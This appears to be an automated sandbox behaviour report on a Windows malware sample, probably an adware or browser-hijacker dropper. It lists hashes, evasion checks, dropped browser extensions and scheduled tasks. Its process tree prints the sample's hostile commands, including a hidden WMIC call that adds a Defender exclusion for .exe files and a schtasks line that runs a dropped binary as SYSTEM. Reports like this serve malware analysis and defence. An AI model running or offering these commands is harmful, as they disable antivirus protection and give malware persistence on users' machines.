Analysis
-
max time kernel
125s -
max time network
132s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
06/04/2024, 05:00
Static task
static1
Behavioral task
behavioral1
Sample
0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe
Resource
win10v2004-20240226-en
General
-
Target
0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe
-
Size
6.3MB
-
MD5
31c65b51016a5ea1b97de351bdc3a34e
-
SHA1
84b3f9e243cf7d2e607dc482c81fe2e2c7271378
-
SHA256
0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184
-
SHA512
a53dd6639c4e99e49d419009f947e55b38426a4794c30ccaae546717927a5c4599f88203583bf065bd5a020d6f8b4ffc68dc4b402cbca8cf6d8f7fe39f60e476
-
SSDEEP
196608:91O9hrfn90vjbQL0MZMFoENqo0C029v7CGQp0wx:3OLrojkLwFo51ETCGa0wx
Malware Config
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 22 4800 Process not Found 28 4800 Process not Found 30 4800 Process not Found 33 4800 Process not Found 59 384 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation ULqDaEV.exe Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 3 IoCs
pid Process 3880 Install.exe 4636 ENTxXds.exe 2312 ULqDaEV.exe -
Loads dropped DLL 1 IoCs
pid Process 384 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json ULqDaEV.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ULqDaEV.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ULqDaEV.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini ENTxXds.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ULqDaEV.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 ULqDaEV.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 ULqDaEV.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol ENTxXds.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 ULqDaEV.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ULqDaEV.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ULqDaEV.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ULqDaEV.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ULqDaEV.exe File created C:\Program Files (x86)\fZHZowTYSgfU2\KEmXDcEBYdtZj.dll ULqDaEV.exe File created C:\Program Files (x86)\qBvbbKpBU\EXcBdZ.dll ULqDaEV.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ULqDaEV.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ULqDaEV.exe File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\QKJRxWV.xml ULqDaEV.exe File created C:\Program Files (x86)\epUZFeichsCPC\vQDomDF.dll ULqDaEV.exe File created C:\Program Files (x86)\VDiAXGzPiWUn\XlrWwuo.dll ULqDaEV.exe File created C:\Program Files (x86)\qBvbbKpBU\cLAALdr.xml ULqDaEV.exe File created C:\Program Files (x86)\fZHZowTYSgfU2\jQhmmpX.xml ULqDaEV.exe File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\VGwavyx.dll ULqDaEV.exe File created C:\Program Files (x86)\epUZFeichsCPC\zcKfbEk.xml ULqDaEV.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job schtasks.exe File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job schtasks.exe File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job schtasks.exe File created C:\Windows\Tasks\BinjFlxHFUMMGNOij.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2648 schtasks.exe 2272 schtasks.exe 5008 schtasks.exe 880 schtasks.exe 3968 schtasks.exe 3076 schtasks.exe 1792 schtasks.exe 4800 schtasks.exe 3876 schtasks.exe 2272 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer ENTxXds.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" ENTxXds.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix ULqDaEV.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ULqDaEV.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" ULqDaEV.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume ULqDaEV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ULqDaEV.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2612 powershell.exe 2612 powershell.exe 2120 powershell.exe 2120 powershell.exe 952 powershell.exe 952 powershell.exe 3092 powershell.EXE 3092 powershell.EXE 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2288 powershell.exe 2288 powershell.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe 2312 ULqDaEV.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2612 powershell.exe Token: SeIncreaseQuotaPrivilege 3300 WMIC.exe Token: SeSecurityPrivilege 3300 WMIC.exe Token: SeTakeOwnershipPrivilege 3300 WMIC.exe Token: SeLoadDriverPrivilege 3300 WMIC.exe Token: SeSystemProfilePrivilege 3300 WMIC.exe Token: SeSystemtimePrivilege 3300 WMIC.exe Token: SeProfSingleProcessPrivilege 3300 WMIC.exe Token: SeIncBasePriorityPrivilege 3300 WMIC.exe Token: SeCreatePagefilePrivilege 3300 WMIC.exe Token: SeBackupPrivilege 3300 WMIC.exe Token: SeRestorePrivilege 3300 WMIC.exe Token: SeShutdownPrivilege 3300 WMIC.exe Token: SeDebugPrivilege 3300 WMIC.exe Token: SeSystemEnvironmentPrivilege 3300 WMIC.exe Token: SeRemoteShutdownPrivilege 3300 WMIC.exe Token: SeUndockPrivilege 3300 WMIC.exe Token: SeManageVolumePrivilege 3300 WMIC.exe Token: 33 3300 WMIC.exe Token: 34 3300 WMIC.exe Token: 35 3300 WMIC.exe Token: 36 3300 WMIC.exe Token: SeIncreaseQuotaPrivilege 3300 WMIC.exe Token: SeSecurityPrivilege 3300 WMIC.exe Token: SeTakeOwnershipPrivilege 3300 WMIC.exe Token: SeLoadDriverPrivilege 3300 WMIC.exe Token: SeSystemProfilePrivilege 3300 WMIC.exe Token: SeSystemtimePrivilege 3300 WMIC.exe Token: SeProfSingleProcessPrivilege 3300 WMIC.exe Token: SeIncBasePriorityPrivilege 3300 WMIC.exe Token: SeCreatePagefilePrivilege 3300 WMIC.exe Token: SeBackupPrivilege 3300 WMIC.exe Token: SeRestorePrivilege 3300 WMIC.exe Token: SeShutdownPrivilege 3300 WMIC.exe Token: SeDebugPrivilege 3300 WMIC.exe Token: SeSystemEnvironmentPrivilege 3300 WMIC.exe Token: SeRemoteShutdownPrivilege 3300 WMIC.exe Token: SeUndockPrivilege 3300 WMIC.exe Token: SeManageVolumePrivilege 3300 WMIC.exe Token: 33 3300 WMIC.exe Token: 34 3300 WMIC.exe Token: 35 3300 WMIC.exe Token: 36 3300 WMIC.exe Token: SeDebugPrivilege 2120 powershell.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeDebugPrivilege 3092 powershell.EXE Token: SeDebugPrivilege 2288 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3188 WMIC.exe Token: SeIncreaseQuotaPrivilege 3188 WMIC.exe Token: SeSecurityPrivilege 3188 WMIC.exe Token: SeTakeOwnershipPrivilege 3188 WMIC.exe Token: SeLoadDriverPrivilege 3188 WMIC.exe Token: SeSystemtimePrivilege 3188 WMIC.exe Token: SeBackupPrivilege 3188 WMIC.exe Token: SeRestorePrivilege 3188 WMIC.exe Token: SeShutdownPrivilege 3188 WMIC.exe Token: SeSystemEnvironmentPrivilege 3188 WMIC.exe Token: SeUndockPrivilege 3188 WMIC.exe Token: SeManageVolumePrivilege 3188 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3188 WMIC.exe Token: SeIncreaseQuotaPrivilege 3188 WMIC.exe Token: SeSecurityPrivilege 3188 WMIC.exe Token: SeTakeOwnershipPrivilege 3188 WMIC.exe Token: SeLoadDriverPrivilege 3188 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1080 wrote to memory of 3880 1080 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe 87 PID 1080 wrote to memory of 3880 1080 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe 87 PID 1080 wrote to memory of 3880 1080 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe 87 PID 3880 wrote to memory of 4348 3880 Install.exe 89 PID 3880 wrote to memory of 4348 3880 Install.exe 89 PID 3880 wrote to memory of 4348 3880 Install.exe 89 PID 4348 wrote to memory of 1544 4348 forfiles.exe 91 PID 4348 wrote to memory of 1544 4348 forfiles.exe 91 PID 4348 wrote to memory of 1544 4348 forfiles.exe 91 PID 1544 wrote to memory of 2612 1544 cmd.exe 92 PID 1544 wrote to memory of 2612 1544 cmd.exe 92 PID 1544 wrote to memory of 2612 1544 cmd.exe 92 PID 2612 wrote to memory of 3300 2612 powershell.exe 93 PID 2612 wrote to memory of 3300 2612 powershell.exe 93 PID 2612 wrote to memory of 3300 2612 powershell.exe 93 PID 3880 wrote to memory of 2272 3880 Install.exe 97 PID 3880 wrote to memory of 2272 3880 Install.exe 97 PID 3880 wrote to memory of 2272 3880 Install.exe 97 PID 4636 wrote to memory of 2120 4636 ENTxXds.exe 105 PID 4636 wrote to memory of 2120 4636 ENTxXds.exe 105 PID 4636 wrote to memory of 2120 4636 ENTxXds.exe 105 PID 2120 wrote to memory of 4296 2120 powershell.exe 107 PID 2120 wrote to memory of 4296 2120 powershell.exe 107 PID 2120 wrote to memory of 4296 2120 powershell.exe 107 PID 4296 wrote to memory of 2004 4296 cmd.exe 108 PID 4296 wrote to memory of 2004 4296 cmd.exe 108 PID 4296 wrote to memory of 2004 4296 cmd.exe 108 PID 2120 wrote to memory of 736 2120 powershell.exe 109 PID 2120 wrote to memory of 736 2120 powershell.exe 109 PID 2120 wrote to memory of 736 2120 powershell.exe 109 PID 2120 wrote to memory of 3968 2120 powershell.exe 110 PID 2120 wrote to memory of 3968 2120 powershell.exe 110 PID 2120 wrote to memory of 3968 2120 powershell.exe 110 PID 2120 wrote to memory of 2844 2120 powershell.exe 111 PID 2120 wrote to memory of 2844 2120 powershell.exe 111 PID 2120 wrote to memory of 2844 2120 powershell.exe 111 PID 2120 wrote to memory of 3604 2120 powershell.exe 112 PID 2120 wrote to memory of 3604 2120 powershell.exe 112 PID 2120 wrote to memory of 3604 2120 powershell.exe 112 PID 2120 wrote to memory of 3116 2120 powershell.exe 113 PID 2120 wrote to memory of 3116 2120 powershell.exe 113 PID 2120 wrote to memory of 3116 2120 powershell.exe 113 PID 2120 wrote to memory of 2420 2120 powershell.exe 166 PID 2120 wrote to memory of 2420 2120 powershell.exe 166 PID 2120 wrote to memory of 2420 2120 powershell.exe 166 PID 2120 wrote to memory of 1820 2120 powershell.exe 115 PID 2120 wrote to memory of 1820 2120 powershell.exe 115 PID 2120 wrote to memory of 1820 2120 powershell.exe 115 PID 2120 wrote to memory of 1548 2120 powershell.exe 116 PID 2120 wrote to memory of 1548 2120 powershell.exe 116 PID 2120 wrote to memory of 1548 2120 powershell.exe 116 PID 2120 wrote to memory of 3608 2120 powershell.exe 117 PID 2120 wrote to memory of 3608 2120 powershell.exe 117 PID 2120 wrote to memory of 3608 2120 powershell.exe 117 PID 2120 wrote to memory of 5044 2120 powershell.exe 118 PID 2120 wrote to memory of 5044 2120 powershell.exe 118 PID 2120 wrote to memory of 5044 2120 powershell.exe 118 PID 2120 wrote to memory of 4552 2120 powershell.exe 119 PID 2120 wrote to memory of 4552 2120 powershell.exe 119 PID 2120 wrote to memory of 4552 2120 powershell.exe 119 PID 2120 wrote to memory of 4376 2120 powershell.exe 120 PID 2120 wrote to memory of 4376 2120 powershell.exe 120 PID 2120 wrote to memory of 4376 2120 powershell.exe 120 PID 2120 wrote to memory of 3464 2120 powershell.exe 121
Processes
-
C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1080 -
C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe.\Install.exe /AdidysikD "385118" /S2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3300
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe\" Oz /Lssite_idCpU 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2272
-
-
-
C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exeC:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe Oz /Lssite_idCpU 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4636 -
